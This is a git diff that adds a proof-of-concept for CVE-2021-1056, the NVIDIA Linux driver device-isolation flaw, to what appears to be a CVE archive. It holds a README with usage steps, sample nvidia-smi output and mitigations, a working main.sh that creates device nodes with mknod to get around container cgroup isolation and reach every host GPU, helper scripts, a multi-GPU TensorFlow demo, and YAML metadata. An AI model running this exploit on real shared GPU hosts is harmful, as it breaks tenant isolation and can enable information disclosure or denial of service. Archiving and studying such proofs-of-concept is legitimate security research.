diff --git a/cve/nvidia/2021/CVE-2021-1056/README.md b/cve/nvidia/2021/CVE-2021-1056/README.md new file mode 100644 index 0000000000000000000000000000000000000000..ca9ccc4ace773c69ce7d0c86d0b046628c9fb30c --- /dev/null +++ b/cve/nvidia/2021/CVE-2021-1056/README.md @@ -0,0 +1,163 @@ +# CVE-2021-1056 + +NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure. + +Here demonstrates the vulnerability on GPU containers created by [nvidia-container-runtime](https://github.com/NVIDIA/nvidia-container-runtime). For a comprehensive understanding, check out the accompanying [official post](https://ubuntu.com/security/CVE-2021-1056) for in-depth details. + +## How it works + +By creating specific character device files an attacker in a GPU container(container created by `nvidia-container-runtime`) is able to get access to all GPU devices on the host. + +It also works on GPU pod created by `k8s-device-plugin` on kubernetes cluster. + + + +## Prerequisite + +* Docker 19.03 +* `nvidia-container-toolkit` + +* NVIDIA Driver 418.87.01 / 450.51.05 +* NVIDIA GPU Tesla V100 / TITAN V / Tesla K80 + +NOTE: refer to [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142), this vulnerability works on all GeForce, NVIDIA RTX/Quadro, NVS and Tesla series GPU, and all version drivers. + + + +## Usage + +* start a container with only 1 GPU card and mount + +```bash +$ docker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash +``` + + + +* check gpu status **in container** + +```bash +# nvidia-smi +Sat Jan 9 07:21:03 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | +| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| +| No running processes found | ++-----------------------------------------------------------------------------+ +``` + + + +* execute script **in container** + +```bash +# bash /CVE-2021-1056/main.sh +[INFO] init GPU num: 1 +[DEBUG] /dev/nvidia0 exists, skip +[DEBUG] successfully get /dev/nvidia1 +[DEBUG] successfully get /dev/nvidia2 +[DEBUG] successfully get /dev/nvidia3 +[DEBUG] delete redundant /dev/nvidia4 +[INFO] get extra 3 GPU devices from host +[INFO] current GPU num: 4 +[INFO] exec nvidia-smi: +Sat Jan 9 07:22:43 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | +| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | +| N/A 30C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 | +| N/A 29C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | +| N/A 28C P0 25W / 250W | 0MiB / 32510MiB | 0% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| +| No running processes found | ++-----------------------------------------------------------------------------+ +``` + + + +* run a tensorflow demo **in container** to ensure all the GPUs can indeed be accessed + +```bash +# nohup python /CVE-2021-1056/tf_distr_demo.py > log 2>&1 & +# nvidia-smi +Sat Jan 9 18:58:23 2021 ++-----------------------------------------------------------------------------+ +| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 | +|-------------------------------+----------------------+----------------------+ +| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC | +| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. | +| | | MIG M. | +|===============================+======================+======================| +| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 | +| N/A 32C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 | +| N/A 33C P0 35W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 | +| N/A 33C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ +| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 | +| N/A 32C P0 37W / 250W | 31117MiB / 32510MiB | 1% Default | +| | | N/A | ++-------------------------------+----------------------+----------------------+ + ++-----------------------------------------------------------------------------+ +| Processes: | +| GPU GI CI PID Type Process name GPU Memory | +| ID ID Usage | +|=============================================================================| ++-----------------------------------------------------------------------------+ +``` + + + +## How to prevent + +Recommended + +* Refer to the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142) or to update the NVIDIA GPU driver + +Or + +* Add arg `--cap-drop MKNOD` to the `docker run` to forbid the `mknod` in containers +* Enable `security context` in kubernetes clusters when creating a pod \ No newline at end of file diff --git a/cve/nvidia/2021/CVE-2021-1056/main.sh b/cve/nvidia/2021/CVE-2021-1056/main.sh new file mode 100644 index 0000000000000000000000000000000000000000..504871b786f1761357a85a9338e821920234db08 --- /dev/null +++ b/cve/nvidia/2021/CVE-2021-1056/main.sh @@ -0,0 +1,42 @@ +#!/usr/bin/env bash + +ROOT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd -P) +source "${ROOT}/util.sh" + +INIT_GPU_NUM=$(util::get_gpu_num) +util::log_info "init GPU num: $INIT_GPU_NUM" + +# get major number and minor number from a legal GPU +DEV=/dev/$(ls /dev | grep nvidia[0-9] | head -n 1) +DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" $DEV)) + +GPU_NO=0 +while : +do + # skip this no if device file already exists + if [ -c "/dev/nvidia$GPU_NO" ]; then + util::log_debug "/dev/nvidia$GPU_NO exists, skip" + GPU_NO=`expr $GPU_NO + 1` + continue + fi + + CURRENT_GPU_NUM=$(util::get_gpu_num) + + # create specify device file to trick cgroup + mknod -m 666 /dev/nvidia$GPU_NO c $DEV_NUMBER + + # break if have got all GPUs on the host + if [ $(util::get_gpu_num) == "$CURRENT_GPU_NUM" ]; then + util::log_debug "delete redundant /dev/nvidia$GPU_NO" + rm /dev/nvidia$GPU_NO + break + fi + + util::log_debug "successfully get /dev/nvidia$GPU_NO" + GPU_NO=`expr $GPU_NO + 1` +done + +util::log_info "get extra $(expr $CURRENT_GPU_NUM - $INIT_GPU_NUM) GPU devices from host" +util::log_info "current GPU num: $CURRENT_GPU_NUM" +util::log_info "exec nvidia-smi:" +nvidia-smi \ No newline at end of file diff --git a/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py new file mode 100644 index 0000000000000000000000000000000000000000..e662da3464a603bf549d6001e568c9ab2c2c0483 --- /dev/null +++ b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py @@ -0,0 +1,106 @@ +# coding=utf-8 +from tensorflow.examples.tutorials.mnist import input_data +from tensorflow.python.client import device_lib + +mnist = input_data.read_data_sets("/tmp/data/", one_hot=True) + +import tensorflow as tf + +learning_rate = 0.001 +training_steps = 8250 +batch_size = 100 +display_step = 100 + +n_hidden_1 = 256 +n_hidden_2 = 256 +n_input = 784 +n_classes = 10 + +def _variable_on_cpu(name, shape, initializer): + with tf.device('/cpu:0'): + dtype = tf.float32 + var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype) + return var + +def build_model(): + + def multilayer_perceptron(x, weights, biases): + layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1']) + layer_1 = tf.nn.relu(layer_1) + + layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2']) + layer_2 = tf.nn.relu(layer_2) + + out_layer = tf.matmul(layer_2, weights['out']) + biases['out'] + return out_layer + + with tf.variable_scope('aaa'): + weights = { + 'h1': _variable_on_cpu('h1',[n_input, n_hidden_1],tf.random_normal_initializer()), + 'h2': _variable_on_cpu('h2',[n_hidden_1, n_hidden_2],tf.random_normal_initializer()), + 'out': _variable_on_cpu('out_w',[n_hidden_2, n_classes],tf.random_normal_initializer()) + } + biases = { + 'b1': _variable_on_cpu('b1',[n_hidden_1],tf.random_normal_initializer()), + 'b2': _variable_on_cpu('b2',[n_hidden_2],tf.random_normal_initializer()), + 'out': _variable_on_cpu('out_b',[n_classes],tf.random_normal_initializer()) + } + + pred = multilayer_perceptron(x, weights, biases) + + cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y)) + return cost,pred + + +def average_gradients(tower_grads): + average_grads = [] + for grad_and_vars in zip(*tower_grads): + grads = [] + for g,_ in grad_and_vars: + expanded_g = tf.expand_dims(g, 0) + grads.append(expanded_g) + grad = tf.concat(axis=0, values=grads) + grad = tf.reduce_mean(grad, 0) + v = grad_and_vars[0][1] + grad_and_var = (grad, v) + average_grads.append(grad_and_var) + return average_grads + + +with tf.Graph().as_default(), tf.device('/cpu:0'): + x = tf.placeholder("float", [None, n_input]) + y = tf.placeholder("float", [None, n_classes]) + tower_grads = [] + optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) + local_device_protos = device_lib.list_local_devices() + num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU']) + with tf.variable_scope(tf.get_variable_scope()): + for i in xrange(num_gpus): + with tf.device('/gpu:%d' % i): + cost,pred = build_model() + tf.get_variable_scope().reuse_variables() + grads = optimizer.compute_gradients(cost) + tower_grads.append(grads) + + grads = average_gradients(tower_grads) + apply_gradient_op = optimizer.apply_gradients(grads) + train_op = apply_gradient_op + + init = tf.global_variables_initializer() + sess = tf.Session() + sess.run(init) + + for step in range(training_steps): + image_batch, label_batch = mnist.train.next_batch(batch_size) + _, cost_print = sess.run([train_op, cost], + {x:image_batch, + y:label_batch}) + + if step % display_step == 0: + print("step=%04d" % (step+1)+ " cost=" + str(cost_print)) + print("Optimization Finished!") + correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1)) + accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float")) + with sess.as_default(): + print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels})) + sess.close() \ No newline at end of file diff --git a/cve/nvidia/2021/CVE-2021-1056/util.sh b/cve/nvidia/2021/CVE-2021-1056/util.sh new file mode 100644 index 0000000000000000000000000000000000000000..edadd3aa99b99d1033832f9b548ffb59c48e046a --- /dev/null +++ b/cve/nvidia/2021/CVE-2021-1056/util.sh @@ -0,0 +1,13 @@ +#!/usr/bin/env bash + +function util::get_gpu_num() { + echo "$(nvidia-smi -L | wc -l)" +} + +function util::log_info() { + echo "[INFO] $1" +} + +function util::log_debug() { + echo "[DEBUG] $1" +} \ No newline at end of file diff --git a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml new file mode 100644 index 0000000000000000000000000000000000000000..40d10b98d652d130214bbe641a4d6e75320bad06 --- /dev/null +++ b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-1056 +source: https://github.com/pokerfaceSad/CVE-2021-1056 +info: + name: NVIDIA提供了针对Linux系统的官方显卡驱动程序,这些驱动程序包括内核模块、用户空间库和命令行工具,可以与Linux操作系统集成,提供高性能的图形加速和计算能力。 + severity: High + description: | + 漏洞CVE-2021-1056是NVIDIA GPU驱动程序与设备隔离相关的安全漏洞。当容器以非特权模式启动,攻击者利用这个漏洞,在容器中创建特殊的字符设备文件后,能够获取宿主机上所有GPU设备的访问权限。 + 适用于Linux的 NVIDIA GPU显示驱动程序,所有版本,都包含内核模式层 (nvidia.ko) 中的一个漏洞,在该漏洞中它不完全遵守操作系统文件系统权限以提供 GPU 设备级隔离,这可能会导致拒绝服务 或信息披露。 + scope-of-influence: + nvidia:gpu_driver:390≤390.141, nvidia:gpu_driver:450≤450.102.04, nvidia:gpu_driver:460≤460.32.03. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056 + - https://nvidia.custhelp.com/app/answers/detail/a_id/5142 + - https://ubuntu.com/security/notices/USN-4689-1 + - https://ubuntu.com/security/notices/USN-4689-2 + - https://ubuntu.com/security/CVE-2021-1056 + - https://www.cvedetails.com/cve/CVE-2021-1056/?q=CVE-2021-1056 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H + cvss-score: 7.1 + cve-id: CVE-2021-1056 + cwe-id: CWE-276 + tags: 权限提升, 拒绝服务, 信息泄漏, cve2021 \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index 390c34e04dedcdc99b1d42c4fb2523b4a9b5e825..dc15528a0e6b8415d6fa0062b0dc3ad6064e9bb3 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -16,4 +16,6 @@ cve: - CVE-2023-37708 samba: - CVE-2021-44142 + nvidia: + - CVE-2021-1056 cnvd: \ No newline at end of file